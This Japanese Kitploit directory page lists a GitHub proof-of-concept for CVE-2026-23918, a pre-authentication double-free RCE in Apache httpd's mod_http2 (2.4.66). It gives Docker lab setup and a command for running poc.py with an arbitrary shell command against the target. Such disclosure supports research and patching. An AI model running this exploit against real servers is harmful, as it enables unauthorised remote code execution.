Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23918 — Apache httpd の mod_http2 ストリームクリーンアップにおける二重解放は、pre-auth RCE につながります。 | Kitploit
ツール/GitHubGitHub/striga-ai/cve-2026-23918
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育バイナリエクスプロイト
GitHubstriga-ai/cve-2026-23918

CVE-2026-23918

Apache httpd の mod_http2 ストリームクリーンアップにおける二重解放は、pre-auth RCE につながります。

リポジトリを見る
31644ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23918

Apache httpd の mod_http2 ストリームクリーンアップにおける double-free により、認証前の RCE が可能になります。

影響を受けるバージョン: mod_http2 とマルチスレッド MPM (event/worker) を使用する httpd 2.4.66。 修正版: 2.4.67。

発見・報告者: Bartlomiej Dmitruk (striga.ai) および Stanislaw Strzalkowski (isec.pl)。

詳細解説: https://striga.ai/research/apache-httpd-mod-http2-double-free

要件

  • Docker
  • Python 3

使い方

脆弱な環境をビルドして起動します:

root@kitploit:~
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc

system() と scoreboard のアドレスを取得します:

root@kitploit:~
docker exec httpd-poc python3 /getaddr.py 1

エクスプロイトを実行します:

root@kitploit:~
python3 poc.py --host localhost --port 9443 \
    --cmd 'date >> /tmp/win' --workers 64 \
    --system <system_addr> --scoreboard <scoreboard_addr>

確認します (実行は確率的で、数分から数時間かかる場合があります):

root@kitploit:~
docker exec httpd-poc cat /tmp/win

クリーンアップ

root@kitploit:~
docker rm -f httpd-poc
ツールをダウンロード